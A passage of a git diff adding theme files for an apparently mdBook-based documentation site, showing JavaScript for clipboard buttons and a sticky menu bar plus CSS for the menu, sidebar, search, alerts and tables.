+                }
+                break;
+        }
+    });
+})();
+
+(function clipboard() {
+    var clipButtons = document.querySelectorAll('.clip-button');
+
+    function hideTooltip(elem) {
+        elem.firstChild.innerText = "";
+        elem.className = 'clip-button';
+    }
+
+    function showTooltip(elem, msg) {
+        elem.firstChild.innerText = msg;
+        elem.className = 'clip-button tooltipped';
+    }
+
+    var clipboardSnippets = new ClipboardJS('.clip-button', {
+        text: function (trigger) {
+            hideTooltip(trigger);
+            let playground = trigger.closest("pre");
+            return playground_text(playground, false);
+        }
+    });
+
+    Array.from(clipButtons).forEach(function (clipButton) {
+        clipButton.addEventListener('mouseout', function (e) {
+            hideTooltip(e.currentTarget);
+        });
+    });
+
+    clipboardSnippets.on('success', function (e) {
+        e.clearSelection();
+        showTooltip(e.trigger, "Copied!");
+    });
+
+    clipboardSnippets.on('error', function (e) {
+        showTooltip(e.trigger, "Clipboard error!");
+    });
+})();
+
+(function scrollToTop () {
+    var menuTitle = document.querySelector('.menu-title');
+
+    menuTitle.addEventListener('click', function () {
+        document.scrollingElement.scrollTo({ top: 0, behavior: 'smooth' });
+    });
+})();
+
+(function controllMenu() {
+    var menu = document.getElementById('menu-bar');
+
+    (function controllPosition() {
+        var scrollTop = document.scrollingElement.scrollTop;
+        var prevScrollTop = scrollTop;
+        var minMenuY = -menu.clientHeight - 50;
+        // When the script loads, the page can be at any scroll (e.g. if you reforesh it).
+        menu.style.top = scrollTop + 'px';
+        // Same as parseInt(menu.style.top.slice(0, -2), but faster
+        var topCache = menu.style.top.slice(0, -2);
+        menu.classList.remove('sticky');
+        var stickyCache = false; // Same as menu.classList.contains('sticky'), but faster
+        document.addEventListener('scroll', function () {
+            scrollTop = Math.max(document.scrollingElement.scrollTop, 0);
+            // `null` means that it doesn't need to be updated
+            var nextSticky = null;
+            var nextTop = null;
+            var scrollDown = scrollTop > prevScrollTop;
+            var menuPosAbsoluteY = topCache - scrollTop;
+            if (scrollDown) {
+                nextSticky = false;
+                if (menuPosAbsoluteY > 0) {
+                    nextTop = prevScrollTop;
+                }
+            } else {
+                if (menuPosAbsoluteY > 0) {
+                    nextSticky = true;
+                } else if (menuPosAbsoluteY < minMenuY) {
+                    nextTop = prevScrollTop + minMenuY;
+                }
+            }
+            if (nextSticky === true && stickyCache === false) {
+                menu.classList.add('sticky');
+                stickyCache = true;
+            } else if (nextSticky === false && stickyCache === true) {
+                menu.classList.remove('sticky');
+                stickyCache = false;
+            }
+            if (nextTop !== null) {
+                menu.style.top = nextTop + 'px';
+                topCache = nextTop;
+            }
+            prevScrollTop = scrollTop;
+        }, { passive: true });
+    })();
+    (function controllBorder() {
+        function updateBorder() {
+            if (menu.offsetTop === 0) {
+                menu.classList.remove('bordered');
+            } else {
+                menu.classList.add('bordered');
+            }
+        }
+        updateBorder();
+        document.addEventListener('scroll', updateBorder, { passive: true });
+    })();
+})();
+
diff --git a/theme/css/chrome.css b/theme/css/chrome.css
new file mode 100644
index 000000000..8cbda7c69
--- /dev/null
+++ b/theme/css/chrome.css
@@ -0,0 +1,1085 @@
+/* CSS for UI elements (a.k.a. chrome) */
+
+html {
+    scrollbar-color: var(--scrollbar) var(--bg);
+}
+#searchresults a,
+.content a:link,
+a:visited,
+a > .hljs {
+    color: var(--links);
+}
+
+/*
+    body-container is necessary because mobile browsers don't seem to like
+    overflow-x on the body tag when there is a  tag.
+*/
+#body-container {
+    /*
+        This is used when the sidebar pushes the body content off the side of
+        the screen on small screens. Without it, dragging on mobile Safari
+        will want to reposition the viewport in a weird way.
+    */
+    overflow-x: clip;
+}
+
+/* Menu Bar */
+
+#menu-bar,
+#menu-bar-hover-placeholder {
+    z-index: 106;
+    margin: auto calc(0px - var(--page-padding));
+}
+#menu-bar {
+    position: relative;
+    background-color: var(--bg);
+    border-block-end-color: var(--table-border-color);
+    border-block-end-width: 1px;
+    border-block-end-style: solid;
+}
+.menu-bar-container {
+    display: flex;
+    flex-wrap: wrap;
+    margin-left: auto;
+    margin-right: auto;
+    max-width: var(--container-max-width);
+    justify-content: space-between;
+}
+.menu-bar-link, .menu-bar-link:visited {
+    color: var(--menu-bar-link-color);
+    font-size: 14px;
+}
+.menu-bar-link:hover {
+    color: var(--menu-bar-link-color-hover);
+}
+#menu-bar.sticky,
+#menu-bar-hover-placeholder:hover + #menu-bar,
+#menu-bar:hover,
+html.sidebar-visible #menu-bar,
+body.sidebar-visible #menu-bar {
+    position: -webkit-sticky;
+    position: sticky;
+    top: 0 !important;
+}
+#menu-bar-hover-placeholder {
+    position: sticky;
+    position: -webkit-sticky;
+    top: 0;
+    height: var(--menu-bar-height);
+}
+#menu-bar.bordered {
+    border-block-end-color: var(--table-border-color);
+}
+#menu-bar i{
+    position: relative;
+    margin: 0 4px;
+    z-index: 10;
+    cursor: pointer;
+    transition: color 0.5s;
+}
+@media only screen and (max-width: 420px) {
+    #menu-bar i, #menu-bar .icon-button {
+        padding: 0 5px;
+    }
+}
+
+.icon-button {
+    border: none;
+    background: var(--bg);
+    padding: 4px;
+    color: inherit;
+    border-radius: 5px;
+    z-index: 10;
+    cursor: pointer;
+    transition: color 0.5s;
+}
+.icon-button:hover {
+    background: var(--theme-hover);
+}
+.icon-button i {
+    margin: 0;
+}
+
+.right-buttons {
+    margin: 0 15px;
+    display: flex;
+    flex-wrap: wrap;
+    column-gap: 2.6rem;
+    align-items: center;
+}
+.right-buttons a {
+    text-decoration: none;
+}
+
+@media only screen and (min-width:800px) {
+    #menubar-collapse {
+        display: flex !important;
+        flex-wrap: wrap;
+        column-gap: 2.6rem;
+        align-items: center;
+    }
+    
+    #menubar-collapse-toggle {
+        display: none !important;
+    }
+
+    #menubar-collapse-popup{
+        display: none !important;
+    }
+}
+@media only screen and (max-width:799px) {
+    #menubar-collapse {
+        display: none !important;
+    }
+    
+    #menubar-collapse-toggle {
+        display: block !important;
+    }
+}
+
+/* Collapse Menu Popup */
+
+#menubar-collapse-popup {
+    position: absolute;
+    right: 30px;
+    top: var(--menu-bar-height);
+    z-index: 105;
+    border-radius: 5px;
+    font-size: 14px;
+    color: var(--fg);
+    background: var(--bg);
+    border: 1px solid var(--table-border-color);
+    margin: 0;
+    padding: 0px;
+    display: none;
+    flex-direction: column;
+    /* Don't let the children's background extend past the rounded corners. */
+    overflow: hidden;
+}
+#menubar-collapse-popup .menu-bar-link {
+    border: 0;
+    margin: 0;
+    padding: 8px 20px;
+    line-height: 25px;
+    white-space: nowrap;
+    text-align: start;
+    cursor: pointer;
+    color: inherit;
+    background: inherit;
+    font-size: inherit;
+}
+#menubar-collapse-popup .menu-bar-link:hover {
+    background-color: var(--theme-hover);
+}
+
+
+.left-buttons {
+    display: flex;
+    margin: 0 5px;  
+    align-items: center;
+}
+html:not(.js) .left-buttons button {
+    display: none;
+}
+
+.menu-title {
+    display: inline-block;
+    font-weight: 600;
+    font-size: 2rem;
+    line-height: var(--menu-bar-height);
+    text-align: center;
+    margin: 0;
+    flex: 1;
+    white-space: nowrap;
+    overflow: hidden;
+    text-overflow: ellipsis;
+    cursor: pointer;
+    color: var(--fg);
+}
+
+.menu-bar,
+.menu-bar:visited,
+.nav-chapters,
+.nav-chapters:visited,
+.mobile-nav-chapters,
+.mobile-nav-chapters:visited,
+.menu-bar .icon-button,
+.menu-bar a i {
+    color: var(--icons) !important;
+}
+
+.menu-bar i:hover,
+.menu-bar .icon-button:hover,
+.nav-chapters:hover,
+.mobile-nav-chapters i:hover {
+    color: var(--icons-hover) !important;
+    text-decoration: none !important;
+}
+
+/* Nav Icons */
+
+.nav-chapters {
+    font-size: 2.5em;
+    text-align: center;
+    text-decoration: none !important;
+    padding: 2rem;
+    border-radius: 1rem;
+    border: 1px solid var(--table-border-color);
+
+    display: flex;
+    justify-content: center;
+    align-content: center;
+    flex-direction: row;
+
+    transition: color 0.5s, background-color 0.5s;
+}
+
+.nav-chapters:hover {
+    text-decoration:  none !important;
+}
+
+.nav-wrapper {
+    margin-block-start: 50px;
+    display: none;
+}
+
+.mobile-nav-chapters {
+    font-size: 2.5em;
+    text-align: center;
+    text-decoration: none;
+    width: 90px;
+    border-radius: 5px;
+    border: 1px solid var(--table-border-color);
+}
+
+/* Only Firefox supports flow-relative values */
+.previous { float: left; }
+[dir=rtl] .previous { float: right; }
+
+/* Only Firefox supports flow-relative values */
+.next {
+    float: right;
+    right: var(--page-padding);
+}
+[dir=rtl] .next {
+    float: left;
+    right: unset;
+    left: var(--page-padding);
+}
+
+/* Use the correct buttons for RTL layouts*/
+[dir=rtl] .previous i.fa-angle-left:before {content:"\f105";}
+[dir=rtl] .next i.fa-angle-right:before { content:"\f104"; }
+
+@media only screen and (max-width: 1080px) {
+    .nav-wide-wrapper { display: none; }
+    .nav-wrapper { display: block; }
+}
+
+/* sidebar-visible */
+@media only screen and (max-width: 1380px) {
+    #sidebar-toggle-anchor:checked ~ .page-wrapper .nav-wide-wrapper { display: none; }
+    #sidebar-toggle-anchor:checked ~ .page-wrapper .nav-wrapper { display: block; }
+}
+
+/* Inline code */
+
+:not(pre) > .hljs {
+    display: inline;
+    padding: 0.1em 0.3em;
+    border-radius: 3px;
+}
+
+:not(pre):not(a) > .hljs {
+    color: var(--inline-code-color);
+    overflow-x: initial;
+}
+
+a:hover > .hljs {
+    text-decoration: underline;
+}
+
+pre {
+    position: relative;
+}
+pre > .buttons {
+    position: absolute;
+    z-index: 100;
+    right: 0px;
+    top: 2px;
+    margin: 0px;
+    padding: 2px 0px;
+
+    color: var(--icons);
+    cursor: pointer;
+    visibility: hidden;
+    opacity: 0;
+    transition: visibility 0.1s linear, opacity 0.1s linear;
+}
+pre:hover > .buttons {
+    visibility: visible;
+    opacity: 1
+}
+pre > .buttons :hover {
+    color: var(--icons-hover);
+    border-color: var(--table-border-color);
+    background-color: var(--theme-hover);
+}
+pre > .buttons i {
+    margin-inline-start: 8px;
+}
+pre > .buttons button {
+    cursor: inherit;
+    margin: 0px 5px;
+    padding: 4px 4px 3px 5px;
+    font-size: 12px;
+
+    border-style: solid;
+    border-width: 1px;
+    border-radius: 4px;
+    border-color: var(--table-border-color);
+    background-color: var(--theme-hover);
+    transition: 100ms;
+    transition-property: color,border-color,background-color;
+    color: var(--icons);
+}
+
+pre > .buttons button.clip-button {
+    padding: 2px 4px 0px 6px;
+}
+
+pre > .buttons button.clip-button::before {
+    content: "COPY";
+    font-size: 12px;
+    color: var(--icons);
+}
+
+pre > .buttons button.clip-button:hover::before {
+    color: var(--icons-hover);
+}
+
+@media (pointer: coarse) {
+    pre > .buttons button {
+        /* On mobile, make it easier to tap buttons. */
+        padding: 0.3rem 1rem;
+    }
+
+    .sidebar-resize-indicator {
+        /* Hide resize indicator on devices with limited accuracy */
+        display: none;
+    }
+}
+pre > code {
+    display: block;
+    padding: 1rem;
+}
+
+/* FIXME: ACE editors overlap their buttons because ACE does absolute
+   positioning within the code block which breaks padding. The only solution I
+   can think of is to move the padding to the outer pre tag (or insert a div
+   wrapper), but that would require fixing a whole bunch of CSS rules.
+*/
+.hljs.ace_editor {
+  padding: 0rem 0rem;
+}
+
+pre > .result {
+    margin-block-start: 10px;
+}
+
+/* Search */
+
+#searchresults a {
+    text-decoration: none;
+}
+
+mark {
+    border-radius: 2px;
+    padding-block-start: 0;
+    padding-block-end: 1px;
+    padding-inline-start: 3px;
+    padding-inline-end: 3px;
+    margin-block-start: 0;
+    margin-block-end: -1px;
+    margin-inline-start: -3px;
+    margin-inline-end: -3px;
+    background-color: var(--search-mark-bg);
+    transition: background-color 300ms linear;
+    cursor: pointer;
+}
+
+mark.fade-out {
+    background-color: rgba(0,0,0,0) !important;
+    cursor: auto;
+}
+
+
+#search-wrapper {
+    inset: 0;
+    backdrop-filter: blur(100px);
+    z-index: 102;
+    position: fixed; 
+    overflow-y: scroll;
+    overscroll-behavior: contain;
+}
+
+#search-wrapper>div {
+    max-height: 80%;
+    height: 80%;
+    transform: translateY(-50%);
+    top: 50%;
+    position: relative;
+    /* overflow: scroll; */
+    overscroll-behavior: contain;
+    margin-left: auto;
+    margin-right: auto;
+    max-width: var(--content-max-width);
+    background-color: var(--bg);
+    border: 1px solid var(--table-border-color);
+    border-radius: 8px;
+    display: flex;
+    flex-direction: column;
+}
+
+.searchbar-outer {
+    border-bottom: 1px solid var(--table-border-color);
+    border-radius: 8px 8px 0 0;
+}
+
+.searchbar-outer span {
+    position: absolute;
+    top: 12px;
+    left: 15px;
+    font-size: 15px;  
+    color: var(--searchbar-fg);
+}
+
+#searchbar {
+    width: 100%;
+    padding: 10px 16px;
+    transition: box-shadow 300ms ease-in-out;
+    background-color: var(--searchbar-bg);
+    color: var(--searchbar-fg);
+    border: none;
+    border-radius: 8px 8px 0 0;
+    text-indent: 25px;
+}
+
+#searchbar:focus,
+#searchbar.active {
+    outline: none;
+}
+
+.searchresults-header {
+    font-weight: normal;
+    font-size: .7em;
+    padding-block-start: 15px;
+    padding-block-end: 0;
+    padding-inline-start: 20px;
+    padding-inline-end: 20px;
+    color: var(--searchresults-header-fg);
+    overflow-y: scroll;
+    display: none;
+}
+
+.searchresults-outer {
+    overflow: scroll;
+    overscroll-behavior: contain;
+    border-radius: 0 0 8px 8px;
+}
+
+ul#searchresults {
+    list-style: none;
+    max-height: 100%;
+    margin: 0;
+    padding: 0;
+}
+ul#searchresults li {
+    border-radius: 0;
+    border-bottom: 1px solid var(--table-border-color);
+    display: flex;
+    flex-direction: row;
+    justify-content: space-between;
+}
+ul#searchresults li:last-child {
+    border-bottom: none;
+}
+ul#searchresults li.focus {
+    background-color: var(--searchresults-li-bg);
+}
+ul#searchresults li a {
+    padding: 15px;
+    color: var(--fg) !important;
+    background-color: var(--bg);
+    font-weight: bold;
+    width: -moz-available;          /* WebKit-based browsers will ignore this. */
+    width: -webkit-fill-available;  /* Mozilla-based browsers will ignore this. */
+    width: fill-available;
+}
+ul#searchresults li a:hover {
+    background-color: var(--theme-hover);
+}
+ul#searchresults li a span.teaser {
+    display: block;
+    clear: both;
+    margin-block-start: 5px;
+    margin-block-end: 0;
+    margin-inline-start: 20px;
+    margin-inline-end: 0;
+    padding-inline-start: 10px;
+    font-size: 0.8em;
+    color: var(--icons-hover) !important;
+    font-weight: 100;
+    border-left: 3px solid var(--icons-hover);
+}
+ul#searchresults li a span.teaser em {
+    font-weight: bold;
+    font-style: normal;
+    color: var(--icons) !important;
+}
+
+/* Container */
+@media only screen and (max-width:1439px) {
+    .container {
+        margin-left: auto;
+        margin-right: auto;
+        max-width: var(--container-max-width);
+        flex-direction: row;
+        display: flex;
+        top: var(--menu-bar-height);
+    }
+    .content{
+        flex: 1 1 0
+    }
+    .content main {
+        margin-inline-start: auto;
+        margin-inline-end: auto;
+        max-width: 100%;
+    }
+}
+
+@media only screen and (min-width:1440px) {
+    .container {
+        margin-left: auto;
+        margin-right: auto;
+        max-width: var(--container-max-width);
+        flex-direction: row;
+        display: flex;
+        top: var(--menu-bar-height);
+        justify-content: space-between;
+    }
+}
+
+/* Sidebar */
+@media only screen and (min-width:550px) {
+    .sidebar {
+        position: sticky;
+        top: 4rem;
+        height: calc(100vh - 4rem);
+        width: var(--sidebar-width);
+        font-size: 0.875em;
+        box-sizing: border-box;
+        -webkit-overflow-scrolling: touch;
+        overscroll-behavior: contain;
+        background-color: var(--sidebar-bg);
+        color: var(--sidebar-fg);
+    }
+}
+@media only screen and (max-width:549px) {
+    .sidebar {
+        position: fixed;
+        bottom: 0;
+        left: 0;
+        right: 0;
+        top: var(--menu-bar-height);
+        font-size: 0.875em;
+        box-sizing: border-box;
+        -webkit-overflow-scrolling: touch;
+        overscroll-behavior: contain;
+        background-color: var(--sidebar-bg);
+        color: var(--sidebar-fg);
+        z-index: 105;
+    }
+}
+.sidebar-iframe-inner {
+    background-color: var(--sidebar-bg);
+    color: var(--sidebar-fg);
+    padding: 10px 10px;
+    margin: 0;
+    font-size: 1.4rem;
+}
+.sidebar-iframe-outer {
+    border: none;
+    height: 100%;
+    position: absolute;
+    top: 0;
+    bottom: 0;
+    left: 0;
+    right: 0;
+}
+[dir=rtl] .sidebar { left: unset; right: 0; }
+.sidebar-resizing {
+    -moz-user-select: none;
+    -webkit-user-select: none;
+    -ms-user-select: none;
+    user-select: none;
+}
+html:not(.sidebar-resizing) .sidebar {
+    transition: transform 0.3s; /* Animation: slide away */
+}
+.sidebar code {
+    line-height: 2em;
+}
+.sidebar .sidebar-scrollbox {
+    overflow-y: auto;
+    overscroll-behavior: contain;
+    position: absolute;
+    top: 0;
+    bottom: 0;
+    left: 0;
+    right: 0;
+    padding: 10px 10px;
+}
+.sidebar .sidebar-resize-handle {
+    position: absolute;
+    cursor: col-resize;
+    width: 0;
+    right: calc(var(--sidebar-resize-indicator-width) * -1);
+    top: 0;
+    bottom: 0;
+    display: flex;
+    align-items: center;
+}
+
+.sidebar-resize-handle .sidebar-resize-indicator {
+    width: 100%;
+    height: 12px;
+    background-color: var(--icons);
+    margin-inline-start: var(--sidebar-resize-indicator-space);
+}
+
+[dir=rtl] .sidebar .sidebar-resize-handle {
+    left: calc(var(--sidebar-resize-indicator-width) * -1);
+    right: unset;
+}
+.js .sidebar .sidebar-resize-handle {
+    cursor: col-resize;
+    width: calc(var(--sidebar-resize-indicator-width) - var(--sidebar-resize-indicator-space));
+}
+/* sidebar-hidden */
+#sidebar-toggle-anchor:not(:checked) ~ .page-wrapper .page #container #sidebar {
+    display: none;
+    
+}
+#sidebar-toggle-anchor:checked ~ .page-wrapper .page #container #sidebar {
+    display: block;
+}
+.sidebar::-webkit-scrollbar {
+    background: var(--sidebar-bg);
+}
+.sidebar::-webkit-scrollbar-thumb {
+    background: var(--scrollbar);
+}
+
+.chapter li.part-title {
+    color: var(--fg);
+    font-weight: bold;
+    text-transform: uppercase;
+    letter-spacing: .05em;
+    padding-top: 1.5rem;
+    padding-right: 1.25rem;
+    padding-left: 1.25rem;
+}
+
+.chapter {
+    list-style: none outside none;
+    padding-inline-start: 0;
+    line-height: 2.2em;
+    margin-top: 0;
+}
+
+.chapter ol {
+    width: 100%;
+}
+
+.chapter li {
+    display: flex;
+    color: var(--fg);
+}
+.chapter li a {
+    display: block;
+    padding: 0;
+    text-decoration: none;
+    color: var(--sidebar-fg);
+}
+
+.chapter li a:hover {
+    color: var(--fg);
+}
+
+.chapter li a.active {
+    color: var(--sidebar-active);
+    font-weight: 600;
+}
+
+.chapter li > a.toggle {
+    cursor: pointer;
+    display: block;
+    margin-inline-start: auto;
+    padding: 0 10px;
+    user-select: none;
+    opacity: 0.68;
+}
+
+.chapter li > a.toggle div {
+    transition: transform 0.5s;
+}
+
+/* collapse the section */
+.chapter li:not(.expanded) + li > ol {
+    display: none;
+}
+
+.chapter li.chapter-item {
+    line-height: 1.5em;
+    margin-block-start: 0.6em;
+    font-size: 1.5rem;
+    padding-left: 1.25rem;
+    padding-right: 1.25rem;
+    padding-top: .375rem;
+    padding-bottom: .375rem;
+    border-radius: 5px;
+}
+
+.chapter li.chapter-item:hover {
+    background-color: var(--sidebar-bg-hover);
+    color: var(--fg)
+}
+
+.chapter li.expanded > a.toggle div {
+    transform: rotate(90deg);
+}
+
+.spacer {
+    width: 100%;
+    height: 3px;
+    margin: 5px 0px;
+}
+.chapter .spacer {
+    background-color: var(--sidebar-spacer);
+}
+
+@media (-moz-touch-enabled: 1), (pointer: coarse) {
+    .chapter li a { padding: 5px 0; }
+    .spacer { margin: 10px 0; }
+}
+
+.section {
+    list-style: none outside none;
+    padding-inline-start: 10px;
+    line-height: 1.9em;
+    border-left: 1px solid var(--table-border-color);
+    margin-left: 2.5rem;
+}
+
+.footer {
+    height: var(--footer-height);
+    border-top: 1px solid var(--table-border-color);
+    margin-top: 1rem;
+    align-content: center;
+    z-index: 101;
+}
+.footer .theme-wrapper {
+    max-width: var(--container-max-width);
+    margin-left: auto;
+    margin-right: auto;
+    display: flex;
+    justify-content: end;
+}
+.footer .theme-wrapper .theme-btns {
+    display: flex;
+    flex-direction: row;
+    border-radius: 9999px;
+    background-color: var(--bg);
+    border: 1px solid var(--table-border-color);
+    padding-right: .2rem;
+    padding-left: .2rem;
+
+}
+
+.footer .theme-wrapper .theme-btns button {
+    padding: .3rem;
+    margin-top: .3rem;
+    margin-bottom: .3rem;
+    margin-right: .5rem;
+    margin-left: .5rem;
+    color: var(--icons);
+    border: none;
+    background-color: transparent;
+    cursor: pointer;
+    font-size: 16px;
+    vertical-align: middle;
+}
+
+.footer .theme-wrapper .theme-btns button.theme-selected {
+    color: var(--links);
+}
+
+.footer .theme-wrapper .theme-btns button:hover {
+    color: var(--icons-hover);
+}
+
+/* Details/Summary */
+
+summary {
+    list-style: none;
+    display: flex;
+    align-items: center;
+    padding: 1.5rem;
+    color: var(--menu-bar-link-color-hover);
+    cursor: pointer;
+}
+
+summary::-webkit-details-marker {
+    display: none;
+}
+
+summary:hover {
+    color: var(--menu-bar-link-color);
+}
+
+summary::before {
+    content: '';
+    width: 14px;
+    height: 14px;
+    mask-image: url("https://ka-p.fontawesome.com/releases/v6.6.0/svgs/regular/chevron-right.svg?v=2&token=a463935e93");
+    mask-repeat: no-repeat;
+    mask-position: center center;
+    background: currentColor;
+    margin-right: .5em;
+    transition: 0.2s;
+    transform: rotate(0deg);
+}
+
+details[open] > summary::before {
+    transform: rotate(90deg);
+}
+
+details {
+    border-radius: 8px;
+    background-color: var(--bg);
+    border: 1px solid var(--table-border-color);
+    font-size: 18px;
+    font-weight: 100;
+}
+
+details p {
+    padding-right: 4rem;
+    padding-left: 4rem;
+}
+
+details ul, details ol {
+    padding-right: 6rem;
+    padding-left: 6rem;
+    padding-bottom: 2rem;
+    margin-top: 0;
+}
+
+details ul li {
+    font-size: 16px;
+    margin-top: .8rem;
+}
+
+details ul li:first-child {
+    margin-top: 0;
+}
+
+/* Alerts */
+.mdbook-alerts {
+    padding: 16px 28px 16px 50px !important;
+    margin-bottom: 16px !important;
+    border-left: 0 !important;
+    background-color: var(--mdbook-alerts-color);
+    border-radius: 5px;
+    position: relative;
+}
+
+.mdbook-alerts > :nth-child(2) {
+    margin-top: 0;
+}
+
+.mdbook-alerts-title {
+    display: none !important;
+}
+
+.mdbook-alerts a{
+    color: var(--mdbook-alerts-color-link) !important;
+}
+
+.mdbook-alerts a:hover{
+    color: var(--mdbook-alerts-color-link-hover) !important;
+}
+
+.mdbook-alerts-tip::before{
+    position: absolute;
+    left: 0;
+    top: 0;
+    margin-left: 15px;
+    margin-top: 15px;
+    content: "\f05d";
+    font-family: FontAwesome;
+    font-size: 20px;
+    width: 20px;
+    height: 20px;
+    color: var(--mdbook-alerts-color-link);
+}
+
+.mdbook-alerts-note::before{
+    position: absolute;
+    left: 0;
+    top: 0;
+    margin-left: 15px;
+    margin-top: 15px;
+    content: "\f05a";
+    font-family: FontAwesome;
+    font-size: 20px;
+    width: 20px;
+    height: 20px;
+    color: var(--mdbook-alerts-color-link);
+}
+
+.mdbook-alerts-important::before{
+    position: absolute;
+    left: 0;
+    top: 0;
+    margin-left: 15px;
+    margin-top: 15px;
+    content: "\f006";
+    font-family: FontAwesome;
+    font-size: 20px;
+    width: 20px;
+    height: 20px;
+    color: var(--mdbook-alerts-color-link);
+}
+
+.mdbook-alerts-warning::before{
+    position: absolute;
+    left: 0;
+    top: 0;
+    margin-left: 15px;
+    margin-top: 15px;
+    content: "\f06a";
+    font-family: FontAwesome;
+    font-size: 20px;
+    width: 20px;
+    height: 20px;
+    color: var(--mdbook-alerts-color-link);
+}
+
+.mdbook-alerts-caution::before{
+    position: absolute;
+    left: 0;
+    top: 0;
+    margin-left: 15px;
+    margin-top: 15px;
+    content: "\f071";
+    font-family: FontAwesome;
+    font-size: 20px;
+    width: 20px;
+    height: 20px;
+    color: var(--mdbook-alerts-color-link);
+}
+
+.content_ref {
+    background-color: var(--bg);
+    border: 1px solid var(--table-border-color);
+    border-radius: 8px;
+    padding-bottom: 1.5rem;
+    padding-top: 1.5rem;
+    padding-right: 2rem;
+    padding-left: 2rem;
+    display: flex;
+    justify-content: space-between;
+    flex-direction: row;
+    color: var(--fg) !important;
+    text-decoration: none !important;
+    font-size: 18px;
+}
+
+.content_ref:hover{
+    color: var(--links) !important;
+    text-decoration: none !important;
+}
+
+.content_ref span{
+    display: flex;
+    justify-content: space-between;
+    width: 100%;
+    flex-direction: row;
+    align-items: center;
+    text-decoration: none !important;
+}
+
+.content_ref span::after{
+    content: '';
+    width: 14px;
+    height: 14px;
+    mask-image: url("https://ka-p.fontawesome.com/releases/v6.6.0/svgs/regular/chevron-right.svg?v=2&token=a463935e93");
+    mask-repeat: no-repeat;
+    mask-position: center center;
+    background: currentColor;
+}
+
+.tabs-container {
+    display: flex;
+    flex-wrap: wrap;
+
+    >input[type="radio"] {
+        display: none;
+
+        &:checked+.tab-label {
+            /* this is the active tab */
+            background-color: darkslategray;
+        }
+    }
+
+    >input[type="radio"]:first-child+.tab-label {
+        /* target the first tab label */
+        border-radius: 50px 0 0 50px;
+    }
+
+    >input[type="radio"]:last-of-type+.tab-label {
+        /* target the last tab label */
+        border-radius: 0 50px 50px 0;
+    }
+
+    >input[type="radio"]:not(:checked)+.tab-label+.tab-content {
+        /* hide inactive tabs */
+        display: none;
+    }
+
+    .tab-label {
+        padding: 5px 15px;
+        color: white;
+        background-color: slategray;
+    }
+
+    .tab-content {
+        order: 99;
+        width: 100%;
+        margin-top: 15px;
+        display: block;
+    }
+}
+
+figure, figcaption{
+    text-align: center;
+}
+
+li.chapter-item a.external-link::after {
+    content: "\f08e";
+    font-family: FontAwesome;
+    /* font-size: 15px; */
+    margin-left: 15px;
+    color: currentColor;
+}
\ No newline at end of file
diff --git a/theme/css/general.css b/theme/css/general.css
new file mode 100644
index 000000000..d08e9178d
--- /dev/null
+++ b/theme/css/general.css
@@ -0,0 +1,242 @@
+/* Base styles and content styles */
+
+:root {
+    /* Browser default font-size is 16px, this way 1 rem = 10px */
+    font-size: 62.5%;
+    color-scheme: var(--color-scheme);
+}
+
+html {
+    font-family: __Inter_a4efb0, __Inter_Fallback_a4efb0, system-ui, arial;
+    color: var(--fg);
+    background-color: var(--bg);
+    text-size-adjust: none;
+    -webkit-text-size-adjust: none;
+}
+
+body {
+    margin: 0;
+    font-size: 1.6rem;
+    overflow-x: hidden;
+}
+
+code {
+    font-family: var(--mono-font) !important;
+    font-size: var(--code-font-size);
+    direction: ltr !important;
+}
+
+/* make long words/inline code not x overflow */
+main {
+    overflow-wrap: break-word;
+}
+
+/* make wide tables scroll if they overflow */
+.table-wrapper {
+    overflow-x: auto;
+}
+
+/* Don't change font size in headers. */
+h1 code, h2 code, h3 code, h4 code, h5 code, h6 code {
+    font-size: unset;
+}
+
+.left { float: left; }
+.right { float: right; }
+.boring { opacity: 0.6; }
+.hide-boring .boring { display: none; }
+.hidden { display: none !important; }
+
+h2, h3 { margin-block-start: 2.5em; }
+h4, h5 { margin-block-start: 2em; }
+
+.header + .header h3,
+.header + .header h4,
+.header + .header h5 {
+    margin-block-start: 1em;
+}
+
+h1:target::before,
+h2:target::before,
+h3:target::before,
+h4:target::before,
+h5:target::before,
+h6:target::before {
+    display: inline-block;
+    content: "»";
+    margin-inline-start: -30px;
+    width: 30px;
+}
+
+/* This is broken on Safari as of version 14, but is fixed
+   in Safari Technology Preview 117 which I think will be Safari 14.2.
+   https://bugs.webkit.org/show_bug.cgi?id=218076
+*/
+:target {
+    /* Safari does not support logical properties */
+    scroll-margin-top: calc(var(--menu-bar-height) + 0.5em);
+}
+
+.page {
+    outline: 0;
+    padding: 0 var(--page-padding);
+    margin-block-start: calc(0px - var(--menu-bar-height)); /* Compensate for the #menu-bar-hover-placeholder */
+}
+.page-wrapper {
+    box-sizing: border-box;
+    background-color: var(--bg);
+}
+.no-js .page-wrapper,
+.js:not(.sidebar-resizing) .page-wrapper {
+    transition: margin-left 0.3s ease, transform 0.3s ease; /* Animation: slide away */
+}
+[dir=rtl] .js:not(.sidebar-resizing) .page-wrapper {
+    transition: margin-right 0.3s ease, transform 0.3s ease; /* Animation: slide away */
+}
+
+.content {
+    overflow-y: auto;
+    padding: 0 5px 50px 5px;
+}
+.content main {
+    margin-inline-start: auto;
+    margin-inline-end: auto;
+    max-width: var(--content-max-width);
+}
+.content nav {
+    margin-inline-start: auto;
+    margin-inline-end: auto;
+    max-width: var(--content-max-width);
+    margin-top: 20px;
+}
+.content p { line-height: 1.45em; }
+.content ol { line-height: 1.45em; }
+.content ul { line-height: 1.45em; }
+.content a { text-decoration: none; }
+.content a:hover { text-decoration: underline; }
+.content img, .content video { max-width: 100%; }
+.content .header:link,
+.content .header:visited {
+    color: var(--fg);
+}
+.content .header:link,
+.content .header:visited:hover {
+    text-decoration: none;
+}
+
+table {
+    margin: 0 auto;
+    border-collapse: collapse;
+}
+table td {
+    padding: 3px 20px;
+    border: 1px var(--table-border-color) solid;
+}
+table thead {
+    background: var(--table-header-bg);
+}
+table thead td {
+    font-weight: 700;
+    border: none;
+}
+table thead th {
+    padding: 3px 20px;
+}
+table thead tr {
+    border: 1px var(--table-header-bg) solid;
+}
+/* Alternate background colors for rows */
+table tbody tr:nth-child(2n) {
+    background: var(--table-alternate-bg);
+}
+
+
+blockquote {
+    margin: 20px 0;
+    padding: 0 20px;
+    color: var(--fg);
+    background-color: var(--quote-bg);
+    border-block-start: .1em solid var(--quote-border);
+    border-block-end: .1em solid var(--quote-border);
+}
+
+.warning {
+    margin: 20px;
+    padding: 0 20px;
+    border-inline-start: 2px solid var(--warning-border);
+}
+
+.warning:before {
+    position: absolute;
+    width: 3rem;
+    height: 3rem;
+    margin-inline-start: calc(-1.5rem - 21px);
+    content: "ⓘ";
+    text-align: center;
+    background-color: var(--bg);
+    color: var(--warning-border);
+    font-weight: bold;
+    font-size: 2rem;
+}
+
